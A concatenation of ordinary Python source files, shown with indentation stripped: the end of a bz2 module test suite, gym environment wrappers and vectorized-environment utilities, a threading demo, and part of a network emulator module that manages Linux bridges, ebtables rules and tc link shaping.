self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
# "Test BZ2Decompressor.decompress()"
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
# "Test BZ2Decompressor.decompress() with chunks of 10 bytes"
bz2d = BZ2Decompressor()
text = ''
n = 0
while 1:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
# "Test BZ2Decompressor.decompress() with unused data"
bz2d = BZ2Decompressor()
unused_data = "this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
# "Calling BZ2Decompressor.decompress() after EOS must raise EOFError"
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, "anything")
self.assertRaises(EOFError, bz2d.decompress, "")
@bigmemtest(_4G, memuse=1.25)
def testBigmem(self, size):
# Issue #14398: decompression fails when output data is >=2GB.
if size < _4G:
self.skipTest("Test needs 5GB of memory to run.")
compressed = bz2.compress("a" * _4G)
text = bz2.BZ2Decompressor().decompress(compressed)
self.assertEqual(len(text), _4G)
self.assertEqual(text.strip("a"), "")
class FuncTest(BaseTest):
"Test module functions"
def testCompress(self):
# "Test compress() function"
data = bz2.compress(self.TEXT)
self.assertEqual(self.decompress(data), self.TEXT)
def testCompressEmptyString(self):
# "Test compress() of empty string"
text = bz2.compress('')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
# "Test decompress() function"
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
# "Test decompress() function with empty string"
text = bz2.decompress("")
self.assertEqual(text, "")
def testDecompressToEmptyString(self):
# "Test decompress() of minimal bz2 data to empty string"
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, '')
def testDecompressIncomplete(self):
# "Test decompress() function with incomplete data"
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
@bigmemtest(_4G, memuse=1.25)
def testCompressBigmem(self, size):
text = "a" * size
data = bz2.compress(text)
del text
text = self.decompress(data)
self.assertEqual(len(text), size)
self.assertEqual(text.strip("a"), "")
@bigmemtest(_4G, memuse=1.25)
def testDecompressBigmem(self, size):
# Issue #14398: decompression fails when output data is >=2GB.
if size < _4G:
self.skipTest("Test needs 5GB of memory to run.")
compressed = bz2.compress("a" * _4G)
text = bz2.decompress(compressed)
self.assertEqual(len(text), _4G)
self.assertEqual(text.strip("a"), "")
def test_main():
test_support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
FuncTest
)
test_support.reap_children()
if __name__ == '__main__':
test_main()
# vim:ts=4:sw=4
|
envs_utils.py
|
import os
from abc import ABC, abstractmethod
from collections import OrderedDict
import csv
import json
from multiprocessing import Process, Pipe
import time
current_dir = os.path.dirname(os.path.realpath(__file__))
parent_dir = os.path.dirname(current_dir)
os.sys.path.append(parent_dir)
import gym
from gym import spaces
from gym.core import Wrapper
import numpy as np
import torch
import environments
def make_env(env_id, seed, log_dir, **kwargs):
def _thunk():
env = gym.make(env_id, **kwargs)
env.seed(seed)
if str(env.__class__.__name__).find("TimeLimit") >= 0:
env = TimeLimitMask(env)
if log_dir is not None:
env = Monitor(env, log_dir, allow_early_resets=True)
return env
return _thunk
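# make_env returns a thunk rather than a ready environment so construction can
# be deferred: DummyVecEnv calls the thunk in the parent process, while
# SubprocVecEnv (both defined below) calls it inside each worker process.
# Illustrative usage (the env id is a placeholder): make_env("CartPole-v1", 0, None)()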
class TimeLimitMask(gym.Wrapper):
def step(self, action):
obs, rew, done, info = self.env.step(action)
if done and self.env._max_episode_steps == self.env._elapsed_steps:
info["bad_transition"] = True
return obs, rew, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class Monitor(Wrapper):
EXT = "monitor.csv"
f = None
def __init__(
self,
env,
filename,
allow_early_resets=False,
reset_keywords=(),
info_keywords=(),
):
Wrapper.__init__(self, env=env)
self.tstart = time.time()
if filename:
self.results_writer = ResultsWriter(
filename,
header={"t_start": time.time(), "env_id": env.spec and env.spec.id},
extra_keys=reset_keywords + info_keywords,
)
else:
self.results_writer = None
self.reset_keywords = reset_keywords
self.info_keywords = info_keywords
self.allow_early_resets = allow_early_resets
self.rewards = None
self.needs_reset = True
self.episode_rewards = []
self.episode_lengths = []
self.episode_times = []
self.total_steps = 0
self.current_reset_info = (
{}
) # extra info about the current episode, that was passed in during reset()
def reset(self, **kwargs):
self.reset_state()
for k in self.reset_keywords:
v = kwargs.get(k)
if v is None:
raise ValueError("Expected you to pass kwarg %s into reset" % k)
self.current_reset_info[k] = v
return self.env.reset(**kwargs)
def reset_state(self):
if not self.allow_early_resets and not self.needs_reset:
raise RuntimeError(
"Tried to reset an environment before done. If you want to allow early resets, wrap your env with Monitor(env, path, allow_early_resets=True)"
)
self.rewards = []
if hasattr(self, "tensor_rewards"):
self.tensor_rewards.fill_(0)
self.needs_reset = False
def step(self, action):
if self.needs_reset:
raise RuntimeError("Tried to step environment that needs reset")
ob, rew, done, info = self.env.step(action)
self.update(ob, rew, done, info)
return (ob, rew, done, info)
def update(self, ob, rew, done, info):
if isinstance(rew, torch.Tensor):
if not hasattr(self, "tensor_rewards"):
self.tensor_rewards = torch.zeros(rew.shape)
self.tensor_rewards.add_(rew.cpu())
self.rewards.append(float(rew.mean()))
else:
self.rewards.append(rew)
if done:
self.needs_reset = True
eprew = sum(self.rewards)
eplen = len(self.rewards)
epinfo = {
"r": round(eprew, 6),
"l": eplen,
"t": round(time.time() - self.tstart, 6),
}
for k in self.info_keywords:
epinfo[k] = info[k]
self.episode_rewards.append(eprew)
self.episode_lengths.append(eplen)
self.episode_times.append(time.time() - self.tstart)
epinfo.update(self.current_reset_info)
if self.results_writer:
self.results_writer.write_row(epinfo)
assert isinstance(info, dict)
if isinstance(info, dict):
info["episode"] = epinfo
if hasattr(self, "tensor_rewards"):
info["episode"]["mean"] = float(self.tensor_rewards.mean())
info["episode"]["median"] = float(self.tensor_rewards.median())
info["episode"]["min"] = float(self.tensor_rewards.min())
info["episode"]["max"] = float(self.tensor_rewards.max())
self.total_steps += 1
def close(self):
if self.f is not None:
self.f.close()
def get_total_steps(self):
return self.total_steps
def get_episode_rewards(self):
return self.episode_rewards
def get_episode_lengths(self):
return self.episode_lengths
def get_episode_times(self):
return self.episode_times
class ResultsWriter(object):
def __init__(self, filename, header="", extra_keys=()):
self.extra_keys = extra_keys
assert filename is not None
if not filename.endswith(Monitor.EXT):
if os.path.isdir(filename):
filename = os.path.join(filename, Monitor.EXT)
else:
filename = filename + "." + Monitor.EXT
self.f = open(filename, "wt")
if isinstance(header, dict):
header = "# {} \n".format(json.dumps(header))
self.f.write(header)
self.logger = csv.DictWriter(
self.f, fieldnames=("r", "l", "t") + tuple(extra_keys)
)
self.logger.writeheader()
self.f.flush()
def write_row(self, epinfo):
if self.logger:
self.logger.writerow(epinfo)
self.f.flush()
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
@abstractmethod
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
def render(self):
print("Render not defined for %s" % self)
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
class VecEnvWrapper(VecEnv):
def __init__(self, venv, observation_space=None, action_space=None):
self.venv = venv
VecEnv.__init__(
self,
num_envs=venv.num_envs,
observation_space=observation_space or venv.observation_space,
action_space=action_space or venv.action_space,
)
def step_async(self, actions):
self.venv.step_async(actions)
@abstractmethod
def reset(self):
pass
@abstractmethod
def step_wait(self):
pass
def close(self):
return self.venv.close()
def render(self):
self.venv.render()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
shapes, dtypes = {}, {}
self.keys = []
obs_space = env.observation_space
if isinstance(obs_space, spaces.Dict):
assert isinstance(obs_space.spaces, OrderedDict)
subspaces = obs_space.spaces
else:
subspaces = {None: obs_space}
for key, box in subspaces.items():
shapes[key] = box.shape
dtypes[key] = box.dtype
self.keys.append(key)
self.buf_obs = {
k: np.zeros((self.num_envs,) + tuple(shapes[k]), dtype=dtypes[k])
for k in self.keys
}
self.buf_dones = np.zeros((self.num_envs,), dtype=np.bool)
self.buf_rews = np.zeros((self.num_envs,), dtype=np.float32)
self.buf_infos = [{} for _ in range(self.num_envs)]
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
for e in range(self.num_envs):
obs, self.buf_rews[e], self.buf_dones[e], self.buf_infos[e] = self.envs[
e
].step(self.actions[e])
if self.buf_dones[e]:
obs = self.envs[e].reset()
self._save_obs(e, obs)
return (
self._obs_from_buf(),
np.copy(self.buf_rews),
np.copy(self.buf_dones),
self.buf_infos.copy(),
)
def reset(self):
for e in range(self.num_envs):
obs = self.envs[e].reset()
self._save_obs(e, obs)
return self._obs_from_buf()
def close(self):
return
def render(self):
return [e.render() for e in self.envs]
def _save_obs(self, e, obs):
for k in self.keys:
if k is None:
self.buf_obs[k][e] = obs
else:
self.buf_obs[k][e] = obs[k]
def _obs_from_buf(self):
if self.keys == [None]:
return self.buf_obs[None]
else:
return self.buf_obs
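# Pipe protocol used by SubprocVecEnv below: the parent sends ("step", action),
# ("reset", None), ("get_spaces", None) or ("close", None) to each worker, and
# the worker replies with the (ob, reward, done, info) tuple, the reset
# observation, or the (observation_space, action_space) pair respectively.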
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == "step":
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == "reset":
ob = env.reset()
remote.send(ob)
elif cmd == "close":
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
env_fns: list of functions that each create a gym environment to run in a subprocess
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [
Process(
target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))
)
for (work_remote, remote, env_fn) in zip(
self.work_remotes, self.remotes, env_fns
)
]
for p in self.ps:
p.daemon = (
True
) # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(("reset", None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for p in self.ps:
p.join()
self.closed = True
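# A minimal usage sketch (not part of the original module; the env id
# "CartPole-v1" is an illustrative placeholder):
#
#   env_fns = [make_env("CartPole-v1", seed=i, log_dir=None) for i in range(4)]
#   venv = SubprocVecEnv(env_fns)
#   obs = venv.reset()
#   actions = [venv.action_space.sample() for _ in range(4)]
#   obs, rews, dones, infos = venv.step(actions)
#   venv.close()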
|
thread_test.py
|
import threading  # the main threading library in Python 3; the older _thread module is legacy and not recommended
import time
from threading import current_thread
def myTHread(arg1, arg2):
print(current_thread().getName(), 'start')
print('%s, %s' % (arg1, arg2))
time.sleep(3)
print(current_thread().getName(), 'stop')
# start 5 threads in a loop
for i in range(1, 6, 1):
t1 = threading.Thread(target=myTHread, args=(i, i+1))
t1.start()
print(t1, 'begin')
print(current_thread().getName(),'end')
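# A possible extension (not in the original script): keep the Thread objects
# and join() them so the main thread only reports 'end' after every worker
# has finished.
#
#   threads = [threading.Thread(target=myTHread, args=(i, i + 1)) for i in range(1, 6)]
#   for t in threads:
#       t.start()
#   for t in threads:
#       t.join()
#   print(current_thread().getName(), 'all workers finished')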
|
network.py
|
"""
Defines network nodes used within core.
"""
import logging
import math
import threading
import time
from typing import TYPE_CHECKING, Callable, Dict, List, Optional, Type
import netaddr
from core import utils
from core.emulator.data import InterfaceData, LinkData, LinkOptions
from core.emulator.enumerations import (
LinkTypes,
MessageFlags,
NetworkPolicy,
NodeTypes,
RegisterTlvs,
)
from core.errors import CoreCommandError, CoreError
from core.executables import EBTABLES, TC
from core.nodes.base import CoreNetworkBase
from core.nodes.interface import CoreInterface, GreTap, Veth
from core.nodes.netclient import get_net_client
if TYPE_CHECKING:
from core.emulator.distributed import DistributedServer
from core.emulator.session import Session
from core.location.mobility import WirelessModel, WayPointMobility
WirelessModelType = Type[WirelessModel]
LEARNING_DISABLED: int = 0
ebtables_lock: threading.Lock = threading.Lock()
class EbtablesQueue:
"""
Helper class for queuing up ebtables commands into rate-limited
atomic commits. This improves performance and reliability when there are
many WLAN link updates.
"""
# update rate is every 300ms
rate: float = 0.3
# ebtables
atomic_file: str = "/tmp/pycore.ebtables.atomic"
def __init__(self) -> None:
"""
Initialize the helper class, but don't start the update thread
until a WLAN is instantiated.
"""
self.doupdateloop: bool = False
self.updatethread: Optional[threading.Thread] = None
# this lock protects cmds and updates lists
self.updatelock: threading.Lock = threading.Lock()
# list of pending ebtables commands
self.cmds: List[str] = []
# list of WLANs requiring update
self.updates: List["CoreNetwork"] = []
# timestamps of last WLAN update; this keeps track of WLANs that are
# using this queue
self.last_update_time: Dict["CoreNetwork", float] = {}
def startupdateloop(self, wlan: "CoreNetwork") -> None:
"""
Kick off the update loop; only needs to be invoked once.
:return: nothing
"""
with self.updatelock:
self.last_update_time[wlan] = time.monotonic()
if self.doupdateloop:
return
self.doupdateloop = True
self.updatethread = threading.Thread(target=self.updateloop, daemon=True)
self.updatethread.start()
def stopupdateloop(self, wlan: "CoreNetwork") -> None:
"""
Kill the update loop thread if there are no more WLANs using it.
:return: nothing
"""
with self.updatelock:
try:
del self.last_update_time[wlan]
except KeyError:
logging.exception(
"error deleting last update time for wlan, ignored before: %s", wlan
)
if len(self.last_update_time) > 0:
return
self.doupdateloop = False
if self.updatethread:
self.updatethread.join()
self.updatethread = None
def ebatomiccmd(self, cmd: str) -> str:
"""
Helper for building ebtables atomic file command list.
:param cmd: ebtable command
:return: ebtable atomic command
"""
return f"{EBTABLES} --atomic-file {self.atomic_file} {cmd}"
def lastupdate(self, wlan: "CoreNetwork") -> float:
"""
Return the time elapsed since this WLAN was last updated.
:param wlan: wlan entity
:return: elapsed time
"""
try:
elapsed = time.monotonic() - self.last_update_time[wlan]
except KeyError:
self.last_update_time[wlan] = time.monotonic()
elapsed = 0.0
return elapsed
def updated(self, wlan: "CoreNetwork") -> None:
"""
Keep track of when this WLAN was last updated.
:param wlan: wlan entity
:return: nothing
"""
self.last_update_time[wlan] = time.monotonic()
self.updates.remove(wlan)
def updateloop(self) -> None:
"""
Thread target that looks for WLANs needing update, and
rate limits the amount of ebtables activity. Only one userspace program
should use ebtables at any given time, or results can be unpredictable.
:return: nothing
"""
while self.doupdateloop:
with self.updatelock:
for wlan in self.updates:
# Check if wlan is from a previously closed session. Because of the
# rate limiting scheme employed here, this may happen if a new session
# is started soon after closing a previous session.
# TODO: if these are WlanNodes, this will never throw an exception
try:
wlan.session
except Exception:
# Just mark as updated to remove from self.updates.
self.updated(wlan)
continue
if self.lastupdate(wlan) > self.rate:
self.buildcmds(wlan)
self.ebcommit(wlan)
self.updated(wlan)
time.sleep(self.rate)
def ebcommit(self, wlan: "CoreNetwork") -> None:
"""
Perform ebtables atomic commit using commands built in the self.cmds list.
:return: nothing
"""
# save kernel ebtables snapshot to a file
args = self.ebatomiccmd("--atomic-save")
wlan.host_cmd(args)
# modify the table file using queued ebtables commands
for c in self.cmds:
args = self.ebatomiccmd(c)
wlan.host_cmd(args)
self.cmds = []
# commit the table file to the kernel
args = self.ebatomiccmd("--atomic-commit")
wlan.host_cmd(args)
try:
wlan.host_cmd(f"rm -f {self.atomic_file}")
except CoreCommandError:
logging.exception("error removing atomic file: %s", self.atomic_file)
def ebchange(self, wlan: "CoreNetwork") -> None:
"""
Flag a change to the given WLAN's _linked dict, so the ebtables
chain will be rebuilt at the next interval.
:return: nothing
"""
with self.updatelock:
if wlan not in self.updates:
self.updates.append(wlan)
def buildcmds(self, wlan: "CoreNetwork") -> None:
"""
Inspect a _linked dict from a wlan, and rebuild the ebtables chain for that WLAN.
:return: nothing
"""
with wlan._linked_lock:
if wlan.has_ebtables_chain:
# flush the chain
self.cmds.append(f"-F {wlan.brname}")
else:
wlan.has_ebtables_chain = True
self.cmds.extend(
[
f"-N {wlan.brname} -P {wlan.policy.value}",
f"-A FORWARD --logical-in {wlan.brname} -j {wlan.brname}",
]
)
# rebuild the chain
for iface1, v in wlan._linked.items():
for oface2, linked in v.items():
if wlan.policy == NetworkPolicy.DROP and linked:
self.cmds.extend(
[
f"-A {wlan.brname} -i {iface1.localname} -o {oface2.localname} -j ACCEPT",
f"-A {wlan.brname} -o {iface1.localname} -i {oface2.localname} -j ACCEPT",
]
)
elif wlan.policy == NetworkPolicy.ACCEPT and not linked:
self.cmds.extend(
[
f"-A {wlan.brname} -i {iface1.localname} -o {oface2.localname} -j DROP",
f"-A {wlan.brname} -o {iface1.localname} -i {oface2.localname} -j DROP",
]
)
# a global object because all WLANs share the same queue
# cannot have multiple threads invoking the ebtables command
ebq: EbtablesQueue = EbtablesQueue()
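# Typical lifecycle, as used by CoreNetwork below: startup() calls
# ebq.startupdateloop(self), link()/unlink() flag changes via ebq.ebchange(self),
# and shutdown() calls ebq.stopupdateloop(self); the background thread then
# batches the queued rules into rate-limited atomic commits.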
def ebtablescmds(call: Callable[..., str], cmds: List[str]) -> None:
"""
Run ebtable commands.
:param call: function to call commands
:param cmds: commands to call
:return: nothing
"""
with ebtables_lock:
for args in cmds:
call(args)
class CoreNetwork(CoreNetworkBase):
"""
Provides linux bridge network functionality for core nodes.
"""
policy: NetworkPolicy = NetworkPolicy.DROP
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
server: "DistributedServer" = None,
policy: NetworkPolicy = None,
) -> None:
"""
Creates a CoreNetwork (Linux bridge) instance.
:param session: core session instance
:param _id: object id
:param name: object name
:param server: remote server the node will run on; default is None for localhost
:param policy: network policy
"""
super().__init__(session, _id, name, server)
if name is None:
name = str(self.id)
if policy is not None:
self.policy = policy
self.name: Optional[str] = name
sessionid = self.session.short_session_id()
self.brname: str = f"b.{self.id}.{sessionid}"
self.has_ebtables_chain: bool = False
def host_cmd(
self,
args: str,
env: Dict[str, str] = None,
cwd: str = None,
wait: bool = True,
shell: bool = False,
) -> str:
"""
Runs a command that is used to configure and set up the network on the host
system and all configured distributed servers.
:param args: command to run
:param env: environment to run command with
:param cwd: directory to run command in
:param wait: True to wait for status, False otherwise
:param shell: True to use shell, False otherwise
:return: combined stdout and stderr
:raises CoreCommandError: when a non-zero exit status occurs
"""
logging.debug("network node(%s) cmd", self.name)
output = utils.cmd(args, env, cwd, wait, shell)
self.session.distributed.execute(lambda x: x.remote_cmd(args, env, cwd, wait))
return output
def startup(self) -> None:
"""
Linux bridge startup logic.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.net_client.create_bridge(self.brname)
self.has_ebtables_chain = False
self.up = True
ebq.startupdateloop(self)
def shutdown(self) -> None:
"""
Linux bridge shutdown logic.
:return: nothing
"""
if not self.up:
return
ebq.stopupdateloop(self)
try:
self.net_client.delete_bridge(self.brname)
if self.has_ebtables_chain:
cmds = [
f"{EBTABLES} -D FORWARD --logical-in {self.brname} -j {self.brname}",
f"{EBTABLES} -X {self.brname}",
]
ebtablescmds(self.host_cmd, cmds)
except CoreCommandError:
logging.exception("error during shutdown")
# removes veth pairs used for bridge-to-bridge connections
for iface in self.get_ifaces():
iface.shutdown()
self.ifaces.clear()
self._linked.clear()
del self.session
self.up = False
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface.
:param iface: network interface to attach
:return: nothing
"""
if self.up:
iface.net_client.set_iface_master(self.brname, iface.localname)
super().attach(iface)
def detach(self, iface: CoreInterface) -> None:
"""
Detach a network interface.
:param iface: network interface to detach
:return: nothing
"""
if self.up:
iface.net_client.delete_iface(self.brname, iface.localname)
super().detach(iface)
def linked(self, iface1: CoreInterface, iface2: CoreInterface) -> bool:
"""
Determine if the provided network interfaces are linked.
:param iface1: interface one
:param iface2: interface two
:return: True if interfaces are linked, False otherwise
"""
# check if the network interfaces are attached to this network
if self.ifaces[iface1.net_id] != iface1:
raise ValueError(f"inconsistency for interface {iface1.name}")
if self.ifaces[iface2.net_id] != iface2:
raise ValueError(f"inconsistency for interface {iface2.name}")
try:
linked = self._linked[iface1][iface2]
except KeyError:
if self.policy == NetworkPolicy.ACCEPT:
linked = True
elif self.policy == NetworkPolicy.DROP:
linked = False
else:
raise Exception(f"unknown policy: {self.policy.value}")
self._linked[iface1][iface2] = linked
return linked
def unlink(self, iface1: CoreInterface, iface2: CoreInterface) -> None:
"""
Unlink two interfaces, resulting in adding or removing ebtables
filtering rules.
:param iface1: interface one
:param iface2: interface two
:return: nothing
"""
with self._linked_lock:
if not self.linked(iface1, iface2):
return
self._linked[iface1][iface2] = False
ebq.ebchange(self)
def link(self, iface1: CoreInterface, iface2: CoreInterface) -> None:
"""
Link two interfaces together, resulting in adding or removing
ebtables filtering rules.
:param iface1: interface one
:param iface2: interface two
:return: nothing
"""
with self._linked_lock:
if self.linked(iface1, iface2):
return
self._linked[iface1][iface2] = True
ebq.ebchange(self)
def linkconfig(
self, iface: CoreInterface, options: LinkOptions, iface2: CoreInterface = None
) -> None:
"""
Configure link parameters by applying tc queuing disciplines on the interface.
:param iface: interface one
:param options: options for configuring link
:param iface2: interface two
:return: nothing
"""
# determine if any settings have changed
changed = any(
[
iface.setparam("bw", options.bandwidth),
iface.setparam("delay", options.delay),
iface.setparam("loss", options.loss),
iface.setparam("duplicate", options.dup),
iface.setparam("jitter", options.jitter),
iface.setparam("buffer", options.buffer),
]
)
if not changed:
return
# delete tc configuration or create and add it
devname = iface.localname
if all(
[
options.delay is None or options.delay <= 0,
options.jitter is None or options.jitter <= 0,
options.loss is None or options.loss <= 0,
options.dup is None or options.dup <= 0,
options.bandwidth is None or options.bandwidth <= 0,
options.buffer is None or options.buffer <= 0,
]
):
if not iface.getparam("has_netem"):
return
if self.up:
cmd = f"{TC} qdisc delete dev {devname} root handle 10:"
iface.host_cmd(cmd)
iface.setparam("has_netem", False)
else:
netem = ""
if options.bandwidth is not None:
limit = 1000
bw = options.bandwidth / 1000
if options.buffer is not None and options.buffer > 0:
limit = options.buffer
elif options.delay and options.bandwidth:
delay = options.delay / 1000
limit = max(2, math.ceil((2 * bw * delay) / (8 * iface.mtu)))
netem += f" rate {bw}kbit"
netem += f" limit {limit}"
if options.delay is not None:
netem += f" delay {options.delay}us"
if options.jitter is not None:
if options.delay is None:
netem += f" delay 0us {options.jitter}us 25%"
else:
netem += f" {options.jitter}us 25%"
if options.loss is not None and options.loss > 0:
netem += f" loss {min(options.loss, 100)}%"
if options.dup is not None and options.dup > 0:
netem += f" duplicate {min(options.dup, 100)}%"
if self.up:
cmd = f"{TC} qdisc replace dev {devname} root handle 10: netem {netem}"
iface.host_cmd(cmd)
iface.setparam("has_netem", True)
def linknet(self, net: CoreNetworkBase) -> CoreInterface:
"""
Link this bridge with another by creating a veth pair and installing
each device into each bridge.
:param net: network to link with
:return: created interface
"""
sessionid = self.session.short_session_id()
try:
_id = f"{self.id:x}"
except TypeError:
_id = str(self.id)
try:
net_id = f"{net.id:x}"
except TypeError:
net_id = str(net.id)
localname = f"veth{_id}.{net_id}.{sessionid}"
if len(localname) >= 16:
raise ValueError(f"interface local name {localname} too long")
name = f"veth{net_id}.{_id}.{sessionid}"
if len(name) >= 16:
raise ValueError(f"interface name {name} too long")
iface = Veth(self.session, None, name, localname, start=self.up)
self.attach(iface)
if net.up and net.brname:
iface.net_client.set_iface_master(net.brname, iface.name)
i = net.next_iface_id()
net.ifaces[i] = iface
with net._linked_lock:
net._linked[iface] = {}
iface.net = self
iface.othernet = net
return iface
def get_linked_iface(self, net: CoreNetworkBase) -> Optional[CoreInterface]:
"""
Return the interface that links this net with another net
(one that was created using linknet()).
:param net: network to get the linking interface for
:return: interface the provided network is linked to
"""
for iface in self.get_ifaces():
if iface.othernet == net:
return iface
return None
def add_ips(self, ips: List[str]) -> None:
"""
Add ip addresses on the bridge in the format "10.0.0.1/24".
:param ips: ip address to add
:return: nothing
"""
if not self.up:
return
for ip in ips:
self.net_client.create_address(self.brname, ip)
class GreTapBridge(CoreNetwork):
"""
A network consisting of a bridge with a gretap device for tunneling to
another system.
"""
def __init__(
self,
session: "Session",
remoteip: str = None,
_id: int = None,
name: str = None,
policy: NetworkPolicy = NetworkPolicy.ACCEPT,
localip: str = None,
ttl: int = 255,
key: int = None,
server: "DistributedServer" = None,
) -> None:
"""
Create a GreTapBridge instance.
:param session: core session instance
:param remoteip: remote address
:param _id: object id
:param name: object name
:param policy: network policy
:param localip: local address
:param ttl: ttl value
:param key: gre tap key
:param server: remote server the node will run on; default is None for localhost
"""
CoreNetwork.__init__(self, session, _id, name, server, policy)
if key is None:
key = self.session.id ^ self.id
self.grekey: int = key
self.localnum: Optional[int] = None
self.remotenum: Optional[int] = None
self.remoteip: Optional[str] = remoteip
self.localip: Optional[str] = localip
self.ttl: int = ttl
self.gretap: Optional[GreTap] = None
if remoteip is not None:
self.gretap = GreTap(
node=self,
session=session,
remoteip=remoteip,
localip=localip,
ttl=ttl,
key=self.grekey,
)
def startup(self) -> None:
"""
Creates a bridge and adds the gretap device to it.
:return: nothing
"""
super().startup()
if self.gretap:
self.attach(self.gretap)
def shutdown(self) -> None:
"""
Detach the gretap device and remove the bridge.
:return: nothing
"""
if self.gretap:
self.detach(self.gretap)
self.gretap.shutdown()
self.gretap = None
super().shutdown()
def add_ips(self, ips: List[str]) -> None:
"""
Set the remote tunnel endpoint. This is a one-time method for
creating the GreTap device, which requires the remoteip at startup.
The 1st address in the provided list is remoteip, 2nd optionally
specifies localip.
:param ips: address list
:return: nothing
"""
if self.gretap:
raise ValueError(f"gretap already exists for {self.name}")
remoteip = ips[0].split("/")[0]
localip = None
if len(ips) > 1:
localip = ips[1].split("/")[0]
self.gretap = GreTap(
session=self.session,
remoteip=remoteip,
localip=localip,
ttl=self.ttl,
key=self.grekey,
)
self.attach(self.gretap)
def setkey(self, key: int, iface_data: InterfaceData) -> None:
"""
Set the GRE key used for the GreTap device. This needs to be set
prior to instantiating the GreTap device (before addrconfig).
:param key: gre key
:param iface_data: interface data for setting up tunnel key
:return: nothing
"""
self.grekey = key
ips = iface_data.get_ips()
if ips:
self.add_ips(ips)
class CtrlNet(CoreNetwork):
"""
Control network functionality.
"""
policy: NetworkPolicy = NetworkPolicy.ACCEPT
# base control interface index
CTRLIF_IDX_BASE: int = 99
DEFAULT_PREFIX_LIST: List[str] = [
"172.16.0.0/24 172.16.1.0/24 172.16.2.0/24 172.16.3.0/24 172.16.4.0/24",
"172.17.0.0/24 172.17.1.0/24 172.17.2.0/24 172.17.3.0/24 172.17.4.0/24",
"172.18.0.0/24 172.18.1.0/24 172.18.2.0/24 172.18.3.0/24 172.18.4.0/24",
"172.19.0.0/24 172.19.1.0/24 172.19.2.0/24 172.19.3.0/24 172.19.4.0/24",
]
def __init__(
self,
session: "Session",
prefix: str,
_id: int = None,
name: str = None,
hostid: int = None,
server: "DistributedServer" = None,
assign_address: bool = True,
updown_script: str = None,
serverintf: str = None,
) -> None:
"""
Creates a CtrlNet instance.
:param session: core session instance
:param _id: node id
:param name: node name
:param prefix: control network ipv4 prefix
:param hostid: host id
:param server: remote server the node will run on; default is None for localhost
:param assign_address: True to assign an address to the bridge at startup, False otherwise
:param updown_script: updown script
:param serverintf: server interface
:return:
"""
self.prefix: netaddr.IPNetwork = netaddr.IPNetwork(prefix).cidr
self.hostid: Optional[int] = hostid
self.assign_address: bool = assign_address
self.updown_script: Optional[str] = updown_script
self.serverintf: Optional[str] = serverintf
super().__init__(session, _id, name, server)
def add_addresses(self, index: int) -> None:
"""
Add addresses used for created control networks.
:param index: starting address index
:return: nothing
"""
use_ovs = self.session.use_ovs()
address = self.prefix[index]
